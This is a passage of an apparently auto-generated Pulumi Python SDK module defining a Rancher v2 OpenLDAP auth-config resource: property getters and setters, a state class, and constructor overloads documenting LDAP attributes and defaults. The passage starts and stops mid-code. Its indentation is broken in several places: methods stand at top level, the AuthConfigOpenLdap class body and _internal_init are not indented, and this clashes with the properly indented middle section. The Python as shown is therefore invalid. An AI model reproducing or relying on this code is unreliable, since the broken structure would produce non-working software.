    return pulumi.get(self, "group_member_mapping_attribute")

@group_member_mapping_attribute.setter
def group_member_mapping_attribute(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "group_member_mapping_attribute", value)
# Optional input; provider key "groupMemberUserAttribute".
@property
@pulumi.getter(name="groupMemberUserAttribute")
def group_member_user_attribute(self) -> Optional[pulumi.Input[str]]:
    """
    Group member user attribute. Default `entryDN` (string)
    """
    return pulumi.get(self, "group_member_user_attribute")

@group_member_user_attribute.setter
def group_member_user_attribute(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "group_member_user_attribute", value)
# Optional input; provider key "groupNameAttribute".
@property
@pulumi.getter(name="groupNameAttribute")
def group_name_attribute(self) -> Optional[pulumi.Input[str]]:
    """
    Group name attribute. Default `cn` (string)
    """
    return pulumi.get(self, "group_name_attribute")

@group_name_attribute.setter
def group_name_attribute(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "group_name_attribute", value)
# Optional input; provider key "groupObjectClass".
@property
@pulumi.getter(name="groupObjectClass")
def group_object_class(self) -> Optional[pulumi.Input[str]]:
    """
    Group object class. Default `groupOfNames` (string)
    """
    return pulumi.get(self, "group_object_class")

@group_object_class.setter
def group_object_class(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "group_object_class", value)
# Optional input; provider key "groupSearchAttribute".
@property
@pulumi.getter(name="groupSearchAttribute")
def group_search_attribute(self) -> Optional[pulumi.Input[str]]:
    """
    Group search attribute. Default `cn` (string)
    """
    return pulumi.get(self, "group_search_attribute")

@group_search_attribute.setter
def group_search_attribute(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "group_search_attribute", value)
# Optional input; provider key "groupSearchBase".
@property
@pulumi.getter(name="groupSearchBase")
def group_search_base(self) -> Optional[pulumi.Input[str]]:
    """
    Group search base (string)
    """
    return pulumi.get(self, "group_search_base")

@group_search_base.setter
def group_search_base(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "group_search_base", value)
# Optional input; provider key matches the attribute name.
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
    """
    Labels of the resource (map)
    """
    return pulumi.get(self, "labels")

@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
    pulumi.set(self, "labels", value)
# Optional input; provider key "nestedGroupMembershipEnabled".
@property
@pulumi.getter(name="nestedGroupMembershipEnabled")
def nested_group_membership_enabled(self) -> Optional[pulumi.Input[bool]]:
    """
    Nested group membership enable. Default `false` (bool)
    """
    return pulumi.get(self, "nested_group_membership_enabled")

@nested_group_membership_enabled.setter
def nested_group_membership_enabled(self, value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "nested_group_membership_enabled", value)
# Optional input; provider key matches the attribute name.
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
    """
    OpenLdap port. Default `389` (int)
    """
    return pulumi.get(self, "port")

@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
    pulumi.set(self, "port", value)
# Optional input; provider key matches the attribute name.
@property
@pulumi.getter
def tls(self) -> Optional[pulumi.Input[bool]]:
    """
    Enable TLS connection (bool)
    """
    return pulumi.get(self, "tls")

@tls.setter
def tls(self, value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "tls", value)
# Optional input; provider key "userDisabledBitMask".
@property
@pulumi.getter(name="userDisabledBitMask")
def user_disabled_bit_mask(self) -> Optional[pulumi.Input[int]]:
    """
    User disabled bit mask (int)
    """
    return pulumi.get(self, "user_disabled_bit_mask")

@user_disabled_bit_mask.setter
def user_disabled_bit_mask(self, value: Optional[pulumi.Input[int]]):
    pulumi.set(self, "user_disabled_bit_mask", value)
# Optional input; provider key "userEnabledAttribute".
@property
@pulumi.getter(name="userEnabledAttribute")
def user_enabled_attribute(self) -> Optional[pulumi.Input[str]]:
    """
    User enable attribute (string)
    """
    return pulumi.get(self, "user_enabled_attribute")

@user_enabled_attribute.setter
def user_enabled_attribute(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "user_enabled_attribute", value)
# Optional input; provider key "userLoginAttribute".
@property
@pulumi.getter(name="userLoginAttribute")
def user_login_attribute(self) -> Optional[pulumi.Input[str]]:
    """
    User login attribute. Default `uid` (string)
    """
    return pulumi.get(self, "user_login_attribute")

@user_login_attribute.setter
def user_login_attribute(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "user_login_attribute", value)
# Optional input; provider key "userMemberAttribute".
@property
@pulumi.getter(name="userMemberAttribute")
def user_member_attribute(self) -> Optional[pulumi.Input[str]]:
    """
    User member attribute. Default `memberOf` (string)
    """
    return pulumi.get(self, "user_member_attribute")

@user_member_attribute.setter
def user_member_attribute(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "user_member_attribute", value)
# Optional input; provider key "userNameAttribute".
@property
@pulumi.getter(name="userNameAttribute")
def user_name_attribute(self) -> Optional[pulumi.Input[str]]:
    """
    User name attribute. Default `givenName` (string)
    """
    return pulumi.get(self, "user_name_attribute")

@user_name_attribute.setter
def user_name_attribute(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "user_name_attribute", value)
# Optional input; provider key "userObjectClass".
@property
@pulumi.getter(name="userObjectClass")
def user_object_class(self) -> Optional[pulumi.Input[str]]:
    """
    User object class. Default `inetorgperson` (string)
    """
    return pulumi.get(self, "user_object_class")

@user_object_class.setter
def user_object_class(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "user_object_class", value)
# Optional input; provider key "userSearchAttribute".
@property
@pulumi.getter(name="userSearchAttribute")
def user_search_attribute(self) -> Optional[pulumi.Input[str]]:
    """
    User search attribute. Default `uid|sn|givenName` (string)
    """
    return pulumi.get(self, "user_search_attribute")

@user_search_attribute.setter
def user_search_attribute(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "user_search_attribute", value)
@pulumi.input_type
class _AuthConfigOpenLdapState:
    """
    Input state for looking up and filtering AuthConfigOpenLdap resources.

    Every field is optional (state may be partially known); each attribute is
    exposed through a `pulumi.getter`/setter pair backed by `pulumi.get`/`pulumi.set`.
    """

    def __init__(__self__, *,
                 access_mode: Optional[pulumi.Input[str]] = None,
                 allowed_principal_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 certificate: Optional[pulumi.Input[str]] = None,
                 connection_timeout: Optional[pulumi.Input[int]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 group_dn_attribute: Optional[pulumi.Input[str]] = None,
                 group_member_mapping_attribute: Optional[pulumi.Input[str]] = None,
                 group_member_user_attribute: Optional[pulumi.Input[str]] = None,
                 group_name_attribute: Optional[pulumi.Input[str]] = None,
                 group_object_class: Optional[pulumi.Input[str]] = None,
                 group_search_attribute: Optional[pulumi.Input[str]] = None,
                 group_search_base: Optional[pulumi.Input[str]] = None,
                 labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 nested_group_membership_enabled: Optional[pulumi.Input[bool]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 service_account_distinguished_name: Optional[pulumi.Input[str]] = None,
                 service_account_password: Optional[pulumi.Input[str]] = None,
                 test_password: Optional[pulumi.Input[str]] = None,
                 test_username: Optional[pulumi.Input[str]] = None,
                 tls: Optional[pulumi.Input[bool]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 user_disabled_bit_mask: Optional[pulumi.Input[int]] = None,
                 user_enabled_attribute: Optional[pulumi.Input[str]] = None,
                 user_login_attribute: Optional[pulumi.Input[str]] = None,
                 user_member_attribute: Optional[pulumi.Input[str]] = None,
                 user_name_attribute: Optional[pulumi.Input[str]] = None,
                 user_object_class: Optional[pulumi.Input[str]] = None,
                 user_search_attribute: Optional[pulumi.Input[str]] = None,
                 user_search_base: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering AuthConfigOpenLdap resources.
        :param pulumi.Input[str] access_mode: Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
        :param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_principal_ids: Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
        :param pulumi.Input[Mapping[str, Any]] annotations: Annotations of the resource (map)
        :param pulumi.Input[str] certificate: Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
        :param pulumi.Input[int] connection_timeout: OpenLdap connection timeout. Default `5000` (int)
        :param pulumi.Input[bool] enabled: Enable auth config provider. Default `true` (bool)
        :param pulumi.Input[str] group_dn_attribute: Group DN attribute. Default `entryDN` (string)
        :param pulumi.Input[str] group_member_mapping_attribute: Group member mapping attribute. Default `member` (string)
        :param pulumi.Input[str] group_member_user_attribute: Group member user attribute. Default `entryDN` (string)
        :param pulumi.Input[str] group_name_attribute: Group name attribute. Default `cn` (string)
        :param pulumi.Input[str] group_object_class: Group object class. Default `groupOfNames` (string)
        :param pulumi.Input[str] group_search_attribute: Group search attribute. Default `cn` (string)
        :param pulumi.Input[str] group_search_base: Group search base (string)
        :param pulumi.Input[Mapping[str, Any]] labels: Labels of the resource (map)
        :param pulumi.Input[str] name: (Computed) The name of the resource (string)
        :param pulumi.Input[bool] nested_group_membership_enabled: Nested group membership enable. Default `false` (bool)
        :param pulumi.Input[int] port: OpenLdap port. Default `389` (int)
        :param pulumi.Input[Sequence[pulumi.Input[str]]] servers: OpenLdap servers list (list)
        :param pulumi.Input[str] service_account_distinguished_name: Service account DN for access OpenLdap service (string)
        :param pulumi.Input[str] service_account_password: Service account password for access OpenLdap service (string)
        :param pulumi.Input[str] test_password: Password for test access to OpenLdap service (string)
        :param pulumi.Input[str] test_username: Username for test access to OpenLdap service (string)
        :param pulumi.Input[bool] tls: Enable TLS connection (bool)
        :param pulumi.Input[str] type: (Computed) The type of the resource (string)
        :param pulumi.Input[int] user_disabled_bit_mask: User disabled bit mask (int)
        :param pulumi.Input[str] user_enabled_attribute: User enable attribute (string)
        :param pulumi.Input[str] user_login_attribute: User login attribute. Default `uid` (string)
        :param pulumi.Input[str] user_member_attribute: User member attribute. Default `memberOf` (string)
        :param pulumi.Input[str] user_name_attribute: User name attribute. Default `givenName` (string)
        :param pulumi.Input[str] user_object_class: User object class. Default `inetorgperson` (string)
        :param pulumi.Input[str] user_search_attribute: User search attribute. Default `uid|sn|givenName` (string)
        :param pulumi.Input[str] user_search_base: User search base DN (string)
        """
        # Only persist values that were explicitly provided; None means "unset".
        if access_mode is not None:
            pulumi.set(__self__, "access_mode", access_mode)
        if allowed_principal_ids is not None:
            pulumi.set(__self__, "allowed_principal_ids", allowed_principal_ids)
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if certificate is not None:
            pulumi.set(__self__, "certificate", certificate)
        if connection_timeout is not None:
            pulumi.set(__self__, "connection_timeout", connection_timeout)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if group_dn_attribute is not None:
            pulumi.set(__self__, "group_dn_attribute", group_dn_attribute)
        if group_member_mapping_attribute is not None:
            pulumi.set(__self__, "group_member_mapping_attribute", group_member_mapping_attribute)
        if group_member_user_attribute is not None:
            pulumi.set(__self__, "group_member_user_attribute", group_member_user_attribute)
        if group_name_attribute is not None:
            pulumi.set(__self__, "group_name_attribute", group_name_attribute)
        if group_object_class is not None:
            pulumi.set(__self__, "group_object_class", group_object_class)
        if group_search_attribute is not None:
            pulumi.set(__self__, "group_search_attribute", group_search_attribute)
        if group_search_base is not None:
            pulumi.set(__self__, "group_search_base", group_search_base)
        if labels is not None:
            pulumi.set(__self__, "labels", labels)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if nested_group_membership_enabled is not None:
            pulumi.set(__self__, "nested_group_membership_enabled", nested_group_membership_enabled)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if servers is not None:
            pulumi.set(__self__, "servers", servers)
        if service_account_distinguished_name is not None:
            pulumi.set(__self__, "service_account_distinguished_name", service_account_distinguished_name)
        if service_account_password is not None:
            pulumi.set(__self__, "service_account_password", service_account_password)
        if test_password is not None:
            pulumi.set(__self__, "test_password", test_password)
        if test_username is not None:
            pulumi.set(__self__, "test_username", test_username)
        if tls is not None:
            pulumi.set(__self__, "tls", tls)
        if type is not None:
            pulumi.set(__self__, "type", type)
        if user_disabled_bit_mask is not None:
            pulumi.set(__self__, "user_disabled_bit_mask", user_disabled_bit_mask)
        if user_enabled_attribute is not None:
            pulumi.set(__self__, "user_enabled_attribute", user_enabled_attribute)
        if user_login_attribute is not None:
            pulumi.set(__self__, "user_login_attribute", user_login_attribute)
        if user_member_attribute is not None:
            pulumi.set(__self__, "user_member_attribute", user_member_attribute)
        if user_name_attribute is not None:
            pulumi.set(__self__, "user_name_attribute", user_name_attribute)
        if user_object_class is not None:
            pulumi.set(__self__, "user_object_class", user_object_class)
        if user_search_attribute is not None:
            pulumi.set(__self__, "user_search_attribute", user_search_attribute)
        if user_search_base is not None:
            pulumi.set(__self__, "user_search_base", user_search_base)

    # Accessors below are generated getter/setter pairs; the `name=` argument on
    # `pulumi.getter` gives the provider's camelCase key for the attribute.
    @property
    @pulumi.getter(name="accessMode")
    def access_mode(self) -> Optional[pulumi.Input[str]]:
        """
        Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
        """
        return pulumi.get(self, "access_mode")

    @access_mode.setter
    def access_mode(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "access_mode", value)

    @property
    @pulumi.getter(name="allowedPrincipalIds")
    def allowed_principal_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
        """
        return pulumi.get(self, "allowed_principal_ids")

    @allowed_principal_ids.setter
    def allowed_principal_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "allowed_principal_ids", value)

    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Annotations of the resource (map)
        """
        return pulumi.get(self, "annotations")

    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "annotations", value)

    @property
    @pulumi.getter
    def certificate(self) -> Optional[pulumi.Input[str]]:
        """
        Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
        """
        return pulumi.get(self, "certificate")

    @certificate.setter
    def certificate(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "certificate", value)

    @property
    @pulumi.getter(name="connectionTimeout")
    def connection_timeout(self) -> Optional[pulumi.Input[int]]:
        """
        OpenLdap connection timeout. Default `5000` (int)
        """
        return pulumi.get(self, "connection_timeout")

    @connection_timeout.setter
    def connection_timeout(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "connection_timeout", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Enable auth config provider. Default `true` (bool)
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)

    @property
    @pulumi.getter(name="groupDnAttribute")
    def group_dn_attribute(self) -> Optional[pulumi.Input[str]]:
        """
        Group DN attribute. Default `entryDN` (string)
        """
        return pulumi.get(self, "group_dn_attribute")

    @group_dn_attribute.setter
    def group_dn_attribute(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "group_dn_attribute", value)

    @property
    @pulumi.getter(name="groupMemberMappingAttribute")
    def group_member_mapping_attribute(self) -> Optional[pulumi.Input[str]]:
        """
        Group member mapping attribute. Default `member` (string)
        """
        return pulumi.get(self, "group_member_mapping_attribute")

    @group_member_mapping_attribute.setter
    def group_member_mapping_attribute(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "group_member_mapping_attribute", value)

    @property
    @pulumi.getter(name="groupMemberUserAttribute")
    def group_member_user_attribute(self) -> Optional[pulumi.Input[str]]:
        """
        Group member user attribute. Default `entryDN` (string)
        """
        return pulumi.get(self, "group_member_user_attribute")

    @group_member_user_attribute.setter
    def group_member_user_attribute(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "group_member_user_attribute", value)

    @property
    @pulumi.getter(name="groupNameAttribute")
    def group_name_attribute(self) -> Optional[pulumi.Input[str]]:
        """
        Group name attribute. Default `cn` (string)
        """
        return pulumi.get(self, "group_name_attribute")

    @group_name_attribute.setter
    def group_name_attribute(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "group_name_attribute", value)

    @property
    @pulumi.getter(name="groupObjectClass")
    def group_object_class(self) -> Optional[pulumi.Input[str]]:
        """
        Group object class. Default `groupOfNames` (string)
        """
        return pulumi.get(self, "group_object_class")

    @group_object_class.setter
    def group_object_class(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "group_object_class", value)

    @property
    @pulumi.getter(name="groupSearchAttribute")
    def group_search_attribute(self) -> Optional[pulumi.Input[str]]:
        """
        Group search attribute. Default `cn` (string)
        """
        return pulumi.get(self, "group_search_attribute")

    @group_search_attribute.setter
    def group_search_attribute(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "group_search_attribute", value)

    @property
    @pulumi.getter(name="groupSearchBase")
    def group_search_base(self) -> Optional[pulumi.Input[str]]:
        """
        Group search base (string)
        """
        return pulumi.get(self, "group_search_base")

    @group_search_base.setter
    def group_search_base(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "group_search_base", value)

    @property
    @pulumi.getter
    def labels(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Labels of the resource (map)
        """
        return pulumi.get(self, "labels")

    @labels.setter
    def labels(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "labels", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        (Computed) The name of the resource (string)
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="nestedGroupMembershipEnabled")
    def nested_group_membership_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Nested group membership enable. Default `false` (bool)
        """
        return pulumi.get(self, "nested_group_membership_enabled")

    @nested_group_membership_enabled.setter
    def nested_group_membership_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "nested_group_membership_enabled", value)

    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        """
        OpenLdap port. Default `389` (int)
        """
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter
    def servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        OpenLdap servers list (list)
        """
        return pulumi.get(self, "servers")

    @servers.setter
    def servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "servers", value)

    @property
    @pulumi.getter(name="serviceAccountDistinguishedName")
    def service_account_distinguished_name(self) -> Optional[pulumi.Input[str]]:
        """
        Service account DN for access OpenLdap service (string)
        """
        return pulumi.get(self, "service_account_distinguished_name")

    @service_account_distinguished_name.setter
    def service_account_distinguished_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_account_distinguished_name", value)

    @property
    @pulumi.getter(name="serviceAccountPassword")
    def service_account_password(self) -> Optional[pulumi.Input[str]]:
        """
        Service account password for access OpenLdap service (string)
        """
        return pulumi.get(self, "service_account_password")

    @service_account_password.setter
    def service_account_password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_account_password", value)

    @property
    @pulumi.getter(name="testPassword")
    def test_password(self) -> Optional[pulumi.Input[str]]:
        """
        Password for test access to OpenLdap service (string)
        """
        return pulumi.get(self, "test_password")

    @test_password.setter
    def test_password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "test_password", value)

    @property
    @pulumi.getter(name="testUsername")
    def test_username(self) -> Optional[pulumi.Input[str]]:
        """
        Username for test access to OpenLdap service (string)
        """
        return pulumi.get(self, "test_username")

    @test_username.setter
    def test_username(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "test_username", value)

    @property
    @pulumi.getter
    def tls(self) -> Optional[pulumi.Input[bool]]:
        """
        Enable TLS connection (bool)
        """
        return pulumi.get(self, "tls")

    @tls.setter
    def tls(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "tls", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        (Computed) The type of the resource (string)
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter(name="userDisabledBitMask")
    def user_disabled_bit_mask(self) -> Optional[pulumi.Input[int]]:
        """
        User disabled bit mask (int)
        """
        return pulumi.get(self, "user_disabled_bit_mask")

    @user_disabled_bit_mask.setter
    def user_disabled_bit_mask(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "user_disabled_bit_mask", value)

    @property
    @pulumi.getter(name="userEnabledAttribute")
    def user_enabled_attribute(self) -> Optional[pulumi.Input[str]]:
        """
        User enable attribute (string)
        """
        return pulumi.get(self, "user_enabled_attribute")

    @user_enabled_attribute.setter
    def user_enabled_attribute(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "user_enabled_attribute", value)

    @property
    @pulumi.getter(name="userLoginAttribute")
    def user_login_attribute(self) -> Optional[pulumi.Input[str]]:
        """
        User login attribute. Default `uid` (string)
        """
        return pulumi.get(self, "user_login_attribute")

    @user_login_attribute.setter
    def user_login_attribute(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "user_login_attribute", value)

    @property
    @pulumi.getter(name="userMemberAttribute")
    def user_member_attribute(self) -> Optional[pulumi.Input[str]]:
        """
        User member attribute. Default `memberOf` (string)
        """
        return pulumi.get(self, "user_member_attribute")

    @user_member_attribute.setter
    def user_member_attribute(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "user_member_attribute", value)

    @property
    @pulumi.getter(name="userNameAttribute")
    def user_name_attribute(self) -> Optional[pulumi.Input[str]]:
        """
        User name attribute. Default `givenName` (string)
        """
        return pulumi.get(self, "user_name_attribute")

    @user_name_attribute.setter
    def user_name_attribute(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "user_name_attribute", value)

    @property
    @pulumi.getter(name="userObjectClass")
    def user_object_class(self) -> Optional[pulumi.Input[str]]:
        """
        User object class. Default `inetorgperson` (string)
        """
        return pulumi.get(self, "user_object_class")

    @user_object_class.setter
    def user_object_class(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "user_object_class", value)

    @property
    @pulumi.getter(name="userSearchAttribute")
    def user_search_attribute(self) -> Optional[pulumi.Input[str]]:
        """
        User search attribute. Default `uid|sn|givenName` (string)
        """
        return pulumi.get(self, "user_search_attribute")

    @user_search_attribute.setter
    def user_search_attribute(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "user_search_attribute", value)

    @property
    @pulumi.getter(name="userSearchBase")
    def user_search_base(self) -> Optional[pulumi.Input[str]]:
        """
        User search base DN (string)
        """
        return pulumi.get(self, "user_search_base")

    @user_search_base.setter
    def user_search_base(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "user_search_base", value)
class AuthConfigOpenLdap(pulumi.CustomResource):
# Typing-only overload: construct the resource from individual keyword arguments.
@overload
def __init__(__self__,
             resource_name: str,
             opts: Optional[pulumi.ResourceOptions] = None,
             access_mode: Optional[pulumi.Input[str]] = None,
             allowed_principal_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
             certificate: Optional[pulumi.Input[str]] = None,
             connection_timeout: Optional[pulumi.Input[int]] = None,
             enabled: Optional[pulumi.Input[bool]] = None,
             group_dn_attribute: Optional[pulumi.Input[str]] = None,
             group_member_mapping_attribute: Optional[pulumi.Input[str]] = None,
             group_member_user_attribute: Optional[pulumi.Input[str]] = None,
             group_name_attribute: Optional[pulumi.Input[str]] = None,
             group_object_class: Optional[pulumi.Input[str]] = None,
             group_search_attribute: Optional[pulumi.Input[str]] = None,
             group_search_base: Optional[pulumi.Input[str]] = None,
             labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
             nested_group_membership_enabled: Optional[pulumi.Input[bool]] = None,
             port: Optional[pulumi.Input[int]] = None,
             servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             service_account_distinguished_name: Optional[pulumi.Input[str]] = None,
             service_account_password: Optional[pulumi.Input[str]] = None,
             test_password: Optional[pulumi.Input[str]] = None,
             test_username: Optional[pulumi.Input[str]] = None,
             tls: Optional[pulumi.Input[bool]] = None,
             user_disabled_bit_mask: Optional[pulumi.Input[int]] = None,
             user_enabled_attribute: Optional[pulumi.Input[str]] = None,
             user_login_attribute: Optional[pulumi.Input[str]] = None,
             user_member_attribute: Optional[pulumi.Input[str]] = None,
             user_name_attribute: Optional[pulumi.Input[str]] = None,
             user_object_class: Optional[pulumi.Input[str]] = None,
             user_search_attribute: Optional[pulumi.Input[str]] = None,
             user_search_base: Optional[pulumi.Input[str]] = None,
             __props__=None):
    """
    Provides a Rancher v2 Auth Config OpenLdap resource. This can be used to configure and enable Auth Config OpenLdap for Rancher v2 RKE clusters and retrieve their information.
    In addition to the built-in local auth, only one external auth config provider can be enabled at a time.
    :param str resource_name: The name of the resource.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] access_mode: Access mode for auth. `required`, `restricted`, `unrestricted` are supported. Default `unrestricted` (string)
    :param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_principal_ids: Allowed principal ids for auth. Required if `access_mode` is `required` or `restricted`. Ex: `openldap_user://<DN>` `openldap_group://<DN>` (list)
    :param pulumi.Input[Mapping[str, Any]] annotations: Annotations of the resource (map)
    :param pulumi.Input[str] certificate: Base64 encoded CA certificate for TLS if self-signed. Use filebase64(<FILE>) for encoding file (string)
    :param pulumi.Input[int] connection_timeout: OpenLdap connection timeout. Default `5000` (int)
    :param pulumi.Input[bool] enabled: Enable auth config provider. Default `true` (bool)
    :param pulumi.Input[str] group_dn_attribute: Group DN attribute. Default `entryDN` (string)
    :param pulumi.Input[str] group_member_mapping_attribute: Group member mapping attribute. Default `member` (string)
    :param pulumi.Input[str] group_member_user_attribute: Group member user attribute. Default `entryDN` (string)
    :param pulumi.Input[str] group_name_attribute: Group name attribute. Default `cn` (string)
    :param pulumi.Input[str] group_object_class: Group object class. Default `groupOfNames` (string)
    :param pulumi.Input[str] group_search_attribute: Group search attribute. Default `cn` (string)
    :param pulumi.Input[str] group_search_base: Group search base (string)
    :param pulumi.Input[Mapping[str, Any]] labels: Labels of the resource (map)
    :param pulumi.Input[bool] nested_group_membership_enabled: Nested group membership enable. Default `false` (bool)
    :param pulumi.Input[int] port: OpenLdap port. Default `389` (int)
    :param pulumi.Input[Sequence[pulumi.Input[str]]] servers: OpenLdap servers list (list)
    :param pulumi.Input[str] service_account_distinguished_name: Service account DN for access OpenLdap service (string)
    :param pulumi.Input[str] service_account_password: Service account password for access OpenLdap service (string)
    :param pulumi.Input[str] test_password: Password for test access to OpenLdap service (string)
    :param pulumi.Input[str] test_username: Username for test access to OpenLdap service (string)
    :param pulumi.Input[bool] tls: Enable TLS connection (bool)
    :param pulumi.Input[int] user_disabled_bit_mask: User disabled bit mask (int)
    :param pulumi.Input[str] user_enabled_attribute: User enable attribute (string)
    :param pulumi.Input[str] user_login_attribute: User login attribute. Default `uid` (string)
    :param pulumi.Input[str] user_member_attribute: User member attribute. Default `memberOf` (string)
    :param pulumi.Input[str] user_name_attribute: User name attribute. Default `givenName` (string)
    :param pulumi.Input[str] user_object_class: User object class. Default `inetorgperson` (string)
    :param pulumi.Input[str] user_search_attribute: User search attribute. Default `uid|sn|givenName` (string)
    :param pulumi.Input[str] user_search_base: User search base DN (string)
    """
    ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: AuthConfigOpenLdapArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a Rancher v2 Auth Config OpenLdap resource. This can be used to configure and enable Auth Config OpenLdap for Rancher v2 RKE clusters and retrieve their information.
        In addition to the built-in local auth, only one external auth config provider can be enabled at a time.

        :param str resource_name: The name of the resource.
        :param AuthConfigOpenLdapArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        # Typing-only overload stub: the runtime dispatcher below selects
        # between this args-object form and the keyword-argument form.
        ...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AuthConfigOpenLdapArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access_mode: Optional[pulumi.Input[str]] = None,
allowed_principal_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
certificate: Optional[pulumi.Input[str]] = None,
connection_timeout: Optional[pulumi.Input[int]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
group_dn_attribute: Optional[pulumi.Input[str]] = None,
